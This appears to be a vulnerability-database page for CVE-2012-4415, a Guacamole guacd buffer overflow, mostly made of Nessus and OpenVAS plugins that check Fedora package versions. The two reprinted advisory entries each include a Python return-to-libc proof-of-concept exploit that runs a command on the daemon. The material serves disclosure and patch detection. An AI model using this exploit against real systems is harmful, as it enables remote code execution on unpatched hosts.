ID FEDORA_2012-13914.NASL Type nessus Reporter This script is Copyright (C) 2012-2015 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
Guacamole C stack rebuild
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2012-13914.
#
include("compat.inc");
if (description)
{
script_id(62226);
script_version("$Revision: 1.9 $");
script_cvs_date("$Date: 2015/10/20 22:25:13 $");
script_cve_id("CVE-2012-4415");
script_bugtraq_id(55497);
script_xref(name:"FEDORA", value:"2012-13914");
script_name(english:"Fedora 18 : guacamole-common-0.6.1-2.fc18 / guacamole-common-js-0.6.1-2.fc18 / etc (2012-13914)");
script_summary(english:"Checks rpm output for the updated packages.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"Guacamole C stack rebuild
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=856743"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088025.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?98ed6e1d"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088026.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?82c38fb9"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088027.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?42aab93c"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088028.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?c3f7b9fa"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088029.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?ef9e0e84"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088030.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?784402ee"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088031.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?59f95692"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:guacamole-common");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:guacamole-common-js");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:guacamole-ext");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:guacd");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libguac");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libguac-client-rdp");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:libguac-client-vnc");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:18");
script_set_attribute(attribute:"patch_publication_date", value:"2012/09/13");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/09/24");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^18([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 18.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC18", reference:"guacamole-common-0.6.1-2.fc18")) flag++;
if (rpm_check(release:"FC18", reference:"guacamole-common-js-0.6.1-2.fc18")) flag++;
if (rpm_check(release:"FC18", reference:"guacamole-ext-0.6.1-2.fc18")) flag++;
if (rpm_check(release:"FC18", reference:"guacd-0.6.1-3.fc18")) flag++;
if (rpm_check(release:"FC18", reference:"libguac-0.6.3-1.fc18")) flag++;
if (rpm_check(release:"FC18", reference:"libguac-client-rdp-0.6.1-2.fc18")) flag++;
if (rpm_check(release:"FC18", reference:"libguac-client-vnc-0.6.0-8.fc18")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "guacamole-common / guacamole-common-js / guacamole-ext / guacd / etc");
}
{"cve": [{"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the guac_client_plugin_open function in libguac in Guacamole before 0.6.3 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long protocol name.", "modified": "2012-10-01T04:00:00", "id": "CVE-2012-4415", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4415", "published": "2012-10-01T03:26:00", "title": "CVE-2012-4415", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "description": "\r\n\r\nOverview\r\n========\r\n\r\n "Guacamole is an HTML5 web application that provides access to desktop\r\n environments using remote desktop protocols such as VNC or RDP. A\r\n centralized server acts as a tunnel and proxy, allowing access to\r\n multiple desktops through a web browser. No plugins are needed: the\r\n client requires nothing more than a web browser supporting HTML5 and\r\n AJAX."\r\n\r\n -- http://guac-dev.org/\r\n\r\nguacamole 0.6.0 contains a trivial buffer overflow vulnerability that\r\nallows connected users to execute code with the privileges of the guacd\r\ndaemon. In the Debian distribution the guacd 0.6.0-1 daemon runs as root\r\nand allows connections from unauthenticated users. However, it\r\nfortunately only listens on localhost by default.\r\n\r\nAnalysis\r\n========\r\n\r\nThe server part of guacamole consists of a web application written in\r\nJava and a proxy daemon ("guacd") written in C. The proxy part parses\r\nthe guacamole protocol using the libguac library. This library contains\r\na trivial buffer overflow vulnerability. As you can see in the following\r\nquote the code fails to validate the length of the user supplied input\r\nbefore using strcpy to copy it to a fixed size buffer in stack:\r\n\r\nguac_client_plugin* guac_client_plugin_open(const char* protocol) {\r\n\r\n guac_client_plugin* plugin;\r\n\r\n /* Reference to dlopen()'d plugin */\r\n void* client_plugin_handle;\r\n\r\n /* Client args description */\r\n const char** client_args;\r\n\r\n /* Pluggable client */\r\n char protocol_lib[256] = "libguac-client-";\r\n \r\n union {\r\n guac_client_init_handler* client_init;\r\n void* obj;\r\n } alias;\r\n\r\n /* Add protocol and .so suffix to protocol_lib */\r\n strcat(protocol_lib, protocol);\r\n strcat(protocol_lib, ".so");\r\n\r\n /* Load client plugin */\r\n client_plugin_handle = dlopen(protocol_lib, RTLD_LAZY);\r\n if (!client_plugin_handle) {\r\n guac_error = GUAC_STATUS_BAD_ARGUMENT;\r\n guac_error_message = dlerror();\r\n return NULL;\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2012-08-23 Vulnerability discovered and reported to upstream\r\n2012-08-23 Upstream fixes the issue in http://guac-dev.org/trac/changeset/7dcefa744b4a38825619c00ae8b47e5bae6e38c0/libguac\r\n2012-09-12 Fixed version (libguac 0.6.0-2) is uploaded to Debian\r\n2012-09-19 Upstream releases 0.6.3 that includes the fix\r\n\r\nProof of concept\r\n================\r\n\r\n#!/usr/bin/python\r\n# CVE-2012-4415: PoC for guacd buffer overflow vulnerability\r\n#\r\n# Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi>\r\n#\r\n# Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with\r\n# default configuration. Uses return-to-libc to bypass non-executable\r\n# stack.\r\n#\r\nimport socket, struct\r\nPROTOCOL_ADDRESS = 0xbf807e9f\r\nSYSTEM_ADDRESS = 0xb76e7640\r\nclass GuacdPOC:\r\n def __init__(self, command):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.connect(('localhost', 4822))\r\n self.s("select")\r\n self.c(",")\r\n protocol = (command + "; " + "#" * 265)[:265]\r\n protocol += struct.pack("L", PROTOCOL_ADDRESS)\r\n protocol += struct.pack("L", SYSTEM_ADDRESS)\r\n self.s(protocol)\r\n self.c(";")\r\n def s(self, x):\r\n self.sock.send("%d.%s" % (len(x), x))\r\n def c(self, x):\r\n self.sock.send(x)\r\nGuacdPOC("touch /tmp/owned")\r\n", "modified": "2012-10-04T00:00:00", "published": "2012-10-04T00:00:00", "id": "SECURITYVULNS:DOC:28599", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28599", "title": "CVE-2012-4415: guacamole local root vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:48", "bulletinFamily": "software", "description": "Buffer overflow on request parsing.", "modified": "2012-10-04T00:00:00", "published": "2012-10-04T00:00:00", "id": "SECURITYVULNS:VULN:12611", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12611", "title": "guacamole buffer overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:11", "bulletinFamily": "exploit", "description": "", "modified": "2012-09-25T00:00:00", "published": "2012-09-25T00:00:00", "href": "https://packetstormsecurity.com/files/116835/Guacamole-0.6.0-Buffer-Overflow.html", "id": "PACKETSTORM:116835", "title": "Guacamole 0.6.0 Buffer Overflow", "type": "packetstorm", "sourceData": "`Overview \n======== \n \n\"Guacamole is an HTML5 web application that provides access to desktop \nenvironments using remote desktop protocols such as VNC or RDP. A \ncentralized server acts as a tunnel and proxy, allowing access to \nmultiple desktops through a web browser. No plugins are needed: the \nclient requires nothing more than a web browser supporting HTML5 and \nAJAX.\" \n \n-- http://guac-dev.org/ \n \nguacamole 0.6.0 contains a trivial buffer overflow vulnerability that \nallows connected users to execute code with the privileges of the guacd \ndaemon. In the Debian distribution the guacd 0.6.0-1 daemon runs as root \nand allows connections from unauthenticated users. However, it \nfortunately only listens on localhost by default. \n \nAnalysis \n======== \n \nThe server part of guacamole consists of a web application written in \nJava and a proxy daemon (\"guacd\") written in C. The proxy part parses \nthe guacamole protocol using the libguac library. This library contains \na trivial buffer overflow vulnerability. As you can see in the following \nquote the code fails to validate the length of the user supplied input \nbefore using strcpy to copy it to a fixed size buffer in stack: \n \nguac_client_plugin* guac_client_plugin_open(const char* protocol) { \n \nguac_client_plugin* plugin; \n \n/* Reference to dlopen()'d plugin */ \nvoid* client_plugin_handle; \n \n/* Client args description */ \nconst char** client_args; \n \n/* Pluggable client */ \nchar protocol_lib[256] = \"libguac-client-\"; \n \nunion { \nguac_client_init_handler* client_init; \nvoid* obj; \n} alias; \n \n/* Add protocol and .so suffix to protocol_lib */ \nstrcat(protocol_lib, protocol); \nstrcat(protocol_lib, \".so\"); \n \n/* Load client plugin */ \nclient_plugin_handle = dlopen(protocol_lib, RTLD_LAZY); \nif (!client_plugin_handle) { \nguac_error = GUAC_STATUS_BAD_ARGUMENT; \nguac_error_message = dlerror(); \nreturn NULL; \n \n \nTimeline \n======== \n \n2012-08-23 Vulnerability discovered and reported to upstream \n2012-08-23 Upstream fixes the issue in http://guac-dev.org/trac/changeset/7dcefa744b4a38825619c00ae8b47e5bae6e38c0/libguac \n2012-09-12 Fixed version (libguac 0.6.0-2) is uploaded to Debian \n2012-09-19 Upstream releases 0.6.3 that includes the fix \n \nProof of concept \n================ \n \n#!/usr/bin/python \n# CVE-2012-4415: PoC for guacd buffer overflow vulnerability \n# \n# Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi> \n# \n# Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with \n# default configuration. Uses return-to-libc to bypass non-executable \n# stack. \n# \nimport socket, struct \nPROTOCOL_ADDRESS = 0xbf807e9f \nSYSTEM_ADDRESS = 0xb76e7640 \nclass GuacdPOC: \ndef __init__(self, command): \nself.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nself.sock.connect(('localhost', 4822)) \nself.s(\"select\") \nself.c(\",\") \nprotocol = (command + \"; \" + \"#\" * 265)[:265] \nprotocol += struct.pack(\"L\", PROTOCOL_ADDRESS) \nprotocol += struct.pack(\"L\", SYSTEM_ADDRESS) \nself.s(protocol) \nself.c(\";\") \ndef s(self, x): \nself.sock.send(\"%d.%s\" % (len(x), x)) \ndef c(self, x): \nself.sock.send(x) \nGuacdPOC(\"touch /tmp/owned\") \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/116835/CVE-2012-4415.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-01T02:26:57", "bulletinFamily": "scanner", "description": "Guacamole C stack rebuild\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2012-14097.NASL", "href": "https://www.tenable.com/plugins/nessus/62329", "published": "2012-09-27T00:00:00", "title": "Fedora 16 : guacamole-common-0.6.1-2.fc16 / guacamole-common-js-0.6.1-2.fc16 / etc (2012-14097)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-14097.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62329);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:25:13 $\");\n\n script_cve_id(\"CVE-2012-4415\");\n script_bugtraq_id(55497);\n script_xref(name:\"FEDORA\", value:\"2012-14097\");\n\n script_name(english:\"Fedora 16 : guacamole-common-0.6.1-2.fc16 / guacamole-common-js-0.6.1-2.fc16 / etc (2012-14097)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Guacamole C stack rebuild\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=856743\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088267.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b48c861d\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088268.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a8a5591f\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088269.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7022c204\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088270.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?958e4e3a\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088271.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?26901d33\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088272.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1327e669\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:guacamole-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:guacamole-common-js\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:guacamole-ext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:guacd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libguac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libguac-client-vnc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"guacamole-common-0.6.1-2.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"guacamole-common-js-0.6.1-2.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"guacamole-ext-0.6.1-2.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"guacd-0.6.1-3.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"libguac-0.6.3-1.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"libguac-client-vnc-0.6.0-8.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"guacamole-common / guacamole-common-js / guacamole-ext / guacd / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:26:57", "bulletinFamily": "scanner", "description": "Guacamole C stack rebuild\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2012-14179.NASL", "href": "https://www.tenable.com/plugins/nessus/62335", "published": "2012-09-27T00:00:00", "title": "Fedora 17 : guacamole-common-0.6.1-2.fc17 / guacamole-common-js-0.6.1-2.fc17 / etc (2012-14179)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-14179.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62335);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:25:13 $\");\n\n script_cve_id(\"CVE-2012-4415\");\n script_bugtraq_id(55497);\n script_xref(name:\"FEDORA\", value:\"2012-14179\");\n\n script_name(english:\"Fedora 17 : guacamole-common-0.6.1-2.fc17 / guacamole-common-js-0.6.1-2.fc17 / etc (2012-14179)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Guacamole C stack rebuild\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=856743\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088212.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?85831a2e\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088213.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3be7ba99\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088214.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?09bcfff1\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088215.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55fb42b7\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088216.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75f4e72d\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088217.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bafd7f5d\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-September/088218.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c00f9721\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:guacamole-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:guacamole-common-js\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:guacamole-ext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:guacd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libguac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libguac-client-rdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libguac-client-vnc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"guacamole-common-0.6.1-2.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"guacamole-common-js-0.6.1-2.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"guacamole-ext-0.6.1-2.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"guacd-0.6.1-3.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"libguac-0.6.3-1.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"libguac-client-rdp-0.6.1-2.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"libguac-client-vnc-0.6.0-8.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"guacamole-common / guacamole-common-js / guacamole-ext / guacd / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:38:35", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-09-27T00:00:00", "id": "OPENVAS:1361412562310864736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864736", "title": "Fedora Update for libguac-client-vnc FEDORA-2012-14097", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libguac-client-vnc FEDORA-2012-14097\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088268.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864736\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-27 09:04:34 +0530 (Thu, 27 Sep 2012)\");\n script_cve_id(\"CVE-2012-4415\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n 